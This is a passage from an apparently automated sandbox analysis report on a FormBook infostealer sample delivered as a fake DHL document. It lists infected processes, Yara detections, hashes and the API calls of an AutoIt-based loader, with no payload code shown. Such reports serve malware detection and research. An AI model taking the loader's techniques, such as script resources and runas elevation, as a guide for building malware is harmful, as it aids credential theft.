Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3724240548.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3724240548.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	03:41:12
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\netbtugc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\netbtugc.exe"
Imagebase:	0x30000
File size:	22'016 bytes
MD5 hash:	EE7BBA75B36D54F9E420EB6EE960D146
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3724047677.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3724047677.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3714293337.0000000002750000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3714293337.0000000002750000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3724137057.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3724137057.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	03:41:24
Start date:	09/01/2025
Path:	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe"
Imagebase:	0xf60000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3726222348.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3726222348.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	04:44:05
Start date:	09/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.7%
Dynamic/Decrypted Code Coverage:	1.1%
Signature Coverage:	3.5%
Total number of Nodes:	1588
Total number of Limit Nodes:	34

Executed Functions

Function 003F42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 003F430D

Part of subcall function 003F6B57: _wcslen.LIBCMT ref: 003F6B6A

GetCurrentProcess.KERNEL32(?,0048CB64,00000000,?,?), ref: 003F4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 003F4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 003F4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 003F4466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 003F4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 003F447B
GetSystemInfo.KERNEL32(?,?,?), ref: 003F44A0

Strings

|O, xrefs: 004336F8
GetNativeSystemInfo, xrefs: 003F4460
kernel32.dll, xrefs: 003F444F

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: b1cee10e516bd46d09e9e84203cd76389c5e41f01ee8f8877ad728211e3f9a97
Instruction ID: 65b055973221c3423108a4a7dcaa7d479ff785e88e0267fcb6a57974a91e0508
Opcode Fuzzy Hash: b1cee10e516bd46d09e9e84203cd76389c5e41f01ee8f8877ad728211e3f9a97
Instruction Fuzzy Hash: EFA1C47191A2C4CFE753DB6A7C85DAA3FA46B67308F0459BAD84193B33D2344518CB2D

Function 003F42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,003F50AA,?,?,00000000,00000000), ref: 003F42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003F50AA,?,?,00000000,00000000), ref: 003F42C9
LoadResource.KERNEL32(?,00000000,?,?,003F50AA,?,?,00000000,00000000,?,?,?,?,?,?,003F4F20), ref: 004335BE
SizeofResource.KERNEL32(?,00000000,?,?,003F50AA,?,?,00000000,00000000,?,?,?,?,?,?,003F4F20), ref: 004335D3
LockResource.KERNEL32(003F50AA,?,?,003F50AA,?,?,00000000,00000000,?,?,?,?,?,?,003F4F20,?), ref: 004335E6

Strings

SCRIPT, xrefs: 003F42BF

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 38f6b0277ae3b0bf739573af78d6a7df592dd7a971b8df99fb5a75bea15be1a7
Instruction ID: d841ef5974cce5aab0ff4c7c7e0e9e8dad976f45b40c04fb66ee835856dcc312
Opcode Fuzzy Hash: 38f6b0277ae3b0bf739573af78d6a7df592dd7a971b8df99fb5a75bea15be1a7
Instruction Fuzzy Hash: C3117C70600704BFD7228B65DC88F2B7BB9EBC5B51F2049BDB502966A0DB71D8008771

Function 00432BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 003F2B6B

Part of subcall function 003F3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C1418,?,003F2E7F,?,?,?,00000000), ref: 003F3A78

Part of subcall function 003F9CB3: _wcslen.LIBCMT ref: 003F9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,004B2224), ref: 00432C10
ShellExecuteW.SHELL32(00000000,?,?,004B2224), ref: 00432C17

Strings

runas, xrefs: 00432C0B

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: b8a43b6801317ecfb781cd2898a8844773d820d44cf86d43d6a8eeb4590d709a
Instruction ID: 38c4ee818cc67844554fe70f473565976caa44571bab50ed7e6bf58ab2c43841
Opcode Fuzzy Hash: b8a43b6801317ecfb781cd2898a8844773d820d44cf86d43d6a8eeb4590d709a
Instruction Fuzzy Hash: 9211B431208309AAC707FF60D852EBEB7A4AF95340F44142EF6465B0A3CF35894A8716

Function 003FD730 Relevance: 21.6, APIs: 14, Instructions: 621windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 003FD807
timeGetTime.WINMM ref: 003FDA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003FDB28
TranslateMessage.USER32(?), ref: 003FDB7B
DispatchMessageW.USER32(?), ref: 003FDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003FDB9F
Sleep.KERNEL32(0000000A), ref: 003FDBB1

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 5e7b8cf6ba2afc5d526330aab5fbdd335744b4dc5f0e41311ac42a12f708065d
Instruction ID: c2d323f4624180da1c0d0607e50fdf0585a03f75de651d379a73b1a6a5e163da
Opcode Fuzzy Hash: 5e7b8cf6ba2afc5d526330aab5fbdd335744b4dc5f0e41311ac42a12f708065d
Instruction Fuzzy Hash: B9420430604346EFE726CF24C888B7AB7A6BF45304F54492EF955873A1D7B4E844CB9A

Function 003F2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 003F2D07
RegisterClassExW.USER32(00000030), ref: 003F2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003F2D42
InitCommonControlsEx.COMCTL32(?), ref: 003F2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003F2D6F
LoadIconW.USER32(000000A9), ref: 003F2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003F2D94

Strings

0, xrefs: 003F2CE9
TaskbarCreated, xrefs: 003F2D37
AutoIt v3 GUI, xrefs: 003F2D23
+, xrefs: 003F2CF0

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: fad3cef6dfe78fd91ec731ef2a6674f37ba630446f66f37a01709148756db7f9
Instruction ID: d150101ec41b0f835ecfed62eec4ad173a4b98d0ac5f8e67a3cfe46004bb8221
Opcode Fuzzy Hash: fad3cef6dfe78fd91ec731ef2a6674f37ba630446f66f37a01709148756db7f9
Instruction Fuzzy Hash: B421F2B1901309AFDB40DFA4EC89BDDBBB4FB09700F10852AFA11A62A0D7B54540CFA9

Function 0043065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043039A: CreateFileW.KERNELBASE(00000000,00000000,?,00430704,?,?,00000000,?,00430704,00000000,0000000C), ref: 004303B7

GetLastError.KERNEL32 ref: 0043076F
__dosmaperr.LIBCMT ref: 00430776
GetFileType.KERNELBASE(00000000), ref: 00430782
GetLastError.KERNEL32 ref: 0043078C
__dosmaperr.LIBCMT ref: 00430795
CloseHandle.KERNEL32(00000000), ref: 004307B5
CloseHandle.KERNEL32(?), ref: 004308FF
GetLastError.KERNEL32 ref: 00430931
__dosmaperr.LIBCMT ref: 00430938

Strings

H, xrefs: 004308BD

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: b999123f7d6627a579346d60ed143eed659f1280d41a9af9b1a32c6fd3d6a47a
Instruction ID: 6b4c31d0b55ef2f61066c398b51a7f7e1a59686e36fd769a5285a97b1c820eda
Opcode Fuzzy Hash: b999123f7d6627a579346d60ed143eed659f1280d41a9af9b1a32c6fd3d6a47a
Instruction Fuzzy Hash: 6BA12C32A001088FDF19EF68DC61BAE7BA09B09324F14125EF8159B3D1D7399D53CB59

Function 003F344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003F3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C1418,?,003F2E7F,?,?,?,00000000), ref: 003F3A78

Part of subcall function 003F3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003F3379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003F356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 004331CE
RegCloseKey.ADVAPI32(?), ref: 00433210
_wcslen.LIBCMT ref: 00433277
_wcslen.LIBCMT ref: 00433286

Strings

Software\AutoIt v3\AutoIt, xrefs: 003F3560
\, xrefs: 0043328C
Include, xrefs: 00433184, 004331C5
\Include\, xrefs: 003F3527

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 2f8cc9e63a9c086af88d6885670237ad2164ecfc4802f2af54fe6e7d502c9e11
Instruction ID: 1cd5442bb64ef6617565d239eb81c1e7ba2bf5b483d70ac39d66969a33a76fa0
Opcode Fuzzy Hash: 2f8cc9e63a9c086af88d6885670237ad2164ecfc4802f2af54fe6e7d502c9e11
Instruction Fuzzy Hash: 1C718D714043449EC355EF65DD81D6BBBE8BF89340F40093EF945972B0EBB89A48CB6A

Function 003F2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 003F2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 003F2B9D
LoadIconW.USER32(00000063), ref: 003F2BB3
LoadIconW.USER32(000000A4), ref: 003F2BC5
LoadIconW.USER32(000000A2), ref: 003F2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 003F2BEF
RegisterClassExW.USER32(?), ref: 003F2C40

Part of subcall function 003F2CD4: GetSysColorBrush.USER32(0000000F), ref: 003F2D07
Part of subcall function 003F2CD4: RegisterClassExW.USER32(00000030), ref: 003F2D31
Part of subcall function 003F2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003F2D42
Part of subcall function 003F2CD4: InitCommonControlsEx.COMCTL32(?), ref: 003F2D5F
Part of subcall function 003F2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003F2D6F
Part of subcall function 003F2CD4: LoadIconW.USER32(000000A9), ref: 003F2D85
Part of subcall function 003F2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003F2D94

Strings

#, xrefs: 003F2C16
0, xrefs: 003F2C0F
AutoIt v3, xrefs: 003F2C2F

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: f8c61952da7b72cde504477a840cf5ed72b05f9ef759e0ef3add1e1993923a62
Instruction ID: bfb0cd6216ea3bc25b7beec8806d276159abdecfd6132b49f4b493f37bad7caf
Opcode Fuzzy Hash: f8c61952da7b72cde504477a840cf5ed72b05f9ef759e0ef3add1e1993923a62
Instruction Fuzzy Hash: 2E214C70E00358ABEB509FA5EC85EAE7FB4FB49B54F00043AEA01A66B1D3B54550CF98

Function 003FB710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 003FBB4E

Strings

p%L, xrefs: 003FB8DC
x#L, xrefs: 00440207
p%L, xrefs: 003FBB32
p#L, xrefs: 003FBB6B
p#L, xrefs: 0044024F
p#L, xrefs: 003FBA72
p#L, xrefs: 00440263
x#L, xrefs: 00440168

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Init_thread_footer
String ID: p#L$p#L$p#L$p#L$p%L$p%L$x#L$x#L
API String ID: 1385522511-2709730239
Opcode ID: 08d26018c42c588af9ffdac987eb18529df36da7fb6c76e69a905c631ae1d127
Instruction ID: 47a9ecdfade41551033c2c73385c163d4cda677f75eec4c78448966901ad7a0f
Opcode Fuzzy Hash: 08d26018c42c588af9ffdac987eb18529df36da7fb6c76e69a905c631ae1d127
Instruction Fuzzy Hash: 6332CFB4A00209EFDB11CF54C994EBAB7B9EF44344F15806AEE05AB361C7B8ED41CB95

Function 003F3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,003F316A,?,?), ref: 003F31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,003F316A,?,?), ref: 003F3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003F3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,003F316A,?,?), ref: 003F3232
CreatePopupMenu.USER32 ref: 003F3246
PostQuitMessage.USER32(00000000), ref: 003F3267

Strings

TaskbarCreated, xrefs: 003F322D

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: b9deef9696a8f4fcc54bdcdf832f814bbf7dabb7ab0be57abbfeb0b0659797bf
Instruction ID: 7e2cf95654f0ed4deb10b222b929cd901332f19d02f5b0ae42bfd25645cd33de
Opcode Fuzzy Hash: b9deef9696a8f4fcc54bdcdf832f814bbf7dabb7ab0be57abbfeb0b0659797bf
Instruction Fuzzy Hash: D1411935240209B6EB163B78DD4AF7E3619E706348F04453BFB06866B2CBB9DA40D76D

Function 003FDFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

D%L, xrefs: 003FE1E0
D%L, xrefs: 0044302D
D%L, xrefs: 003FE4B1
D%L, xrefs: 00442FDA
D%LD%L, xrefs: 003FE27E
Variable must be of type 'Object'., xrefs: 004432B7

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID: D%L$D%L$D%L$D%L$D%LD%L$Variable must be of type 'Object'.
API String ID: 0-552296661
Opcode ID: 36d547246c75555642292706ce417ce8f8cdf1ce3b4af8c76f2bd700d2142fc1
Instruction ID: a2697b0f7a8778f3e252ea82716bfd2ec56f179047628f656d9547b0f0b274c9
Opcode Fuzzy Hash: 36d547246c75555642292706ce417ce8f8cdf1ce3b4af8c76f2bd700d2142fc1
Instruction Fuzzy Hash: 97C2B075A00219DFDB25CF58C880ABDB7F1BF04704F24856AEA06AB3A1D379ED41CB95

Function 011864D0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 011865A1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 011867C7

Memory Dump Source

Source File: 00000000.00000002.1268632520.0000000001183000.00000040.00000020.00020000.00000000.sdmp, Offset: 01183000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1183000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction ID: f408efa0d45565d17479a7b28e110ae1c4a20cc9b72fa68e16da61d912dade61
Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction Fuzzy Hash: 69A10A74E00209EBDB18EFA4C994BEEBBB5FF48305F208159E611BB280D7759A41CF95

Function 003F2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003F2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 003F2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,003F1CAD,?), ref: 003F2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,003F1CAD,?), ref: 003F2CCF

Strings

edit, xrefs: 003F2CAC
AutoIt v3, xrefs: 003F2C89, 003F2C8E, 003F2C8F

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 8ace152a60f1e6998520029a94757ed2e9439e0746df089901aafaea7afe98dd
Instruction ID: cb6807ddfa8c349b550dc6b0ba5d3bcc17e3cedd92a66164528da3c1086a480c
Opcode Fuzzy Hash: 8ace152a60f1e6998520029a94757ed2e9439e0746df089901aafaea7afe98dd
